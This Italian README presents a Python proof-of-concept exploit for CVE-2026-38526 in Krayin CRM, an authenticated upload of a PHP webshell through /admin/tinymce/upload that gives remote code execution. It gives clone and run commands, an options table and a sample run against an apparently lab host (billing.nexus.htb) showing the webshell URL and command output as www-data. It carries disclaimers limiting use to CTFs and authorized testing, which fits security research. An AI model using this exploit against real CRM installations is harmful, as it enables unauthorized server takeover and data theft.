
PoC Python che sfrutta CVE-2026-38526 in Krayin CRM <= 2.2.x: upload autenticato di webshell PHP tramite /admin/tinymce/upload che porta all'esecuzione di codice in remoto.
⚠️ Avviso legale: questo codice è fornito a scopo educativo e per test autorizzati esclusivamente (CTF, bug bounty, laboratorio privato). L'autore non è responsabile per un utilizzo illegale.
Krayin CRM (Webkul) ≤ 2.2.x espone l'endpoint /admin/tinymce/upload
che consente a un utente autenticato (anche con privilegi bassi)
di caricare file senza validazione dell'estensione. Il file viene
poi servito dalla cartella storage/, consentendo l'esecuzione
arbitraria di codice PHP.
git clone https://github.com/<TON_PSEUDO>/cve-2026-38526.git
cd cve-2026-38526
pip install -r requirements.txt
python3 cve-2026-38526.py -t http://target.tld -u [email protected] -p 'password' -c 'id'
Opzioni:
| Opzione | Descrizione |
|---|---|
-t, --target | URL radice della destinazione |
-u, --user | Email dell'account Krayin |
-p, --password | Password |
-c, --command | Comando da eseguire (predefinito: id) |
--login-path | Percorso di login (predefinito: /admin/login) |
--upload-path | Percorso di upload (predefinito: /admin/tinymce/upload) |
--timeout | Timeout HTTP (predefinito: 15) |
$ python3 cve-2026-38526.py -t http://billing.nexus.htb \
-u [email protected] -p 'N27xh!!2ucY04' -c 'id'
[*] Recupero del token CSRF su http://billing.nexus.htb/admin/login
[*] Invio del modulo di login
[+] Autenticazione riuscita
[*] Upload di x8f2k1ab.php tramite http://billing.nexus.htb/admin/tinymce/upload
[+] Webshell accessibile: http://billing.nexus.htb/storage/tinymce/x8f2k1ab.php
[*] Esecuzione: id
============================================================
[+] Comando: id
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================
storage/ e uploads/.Questo progetto è pubblicato a fini di ricerca sulla sicurezza. Qualsiasi utilizzo contro sistemi senza autorizzazione scritta preventiva è illegale e strettamente vietato.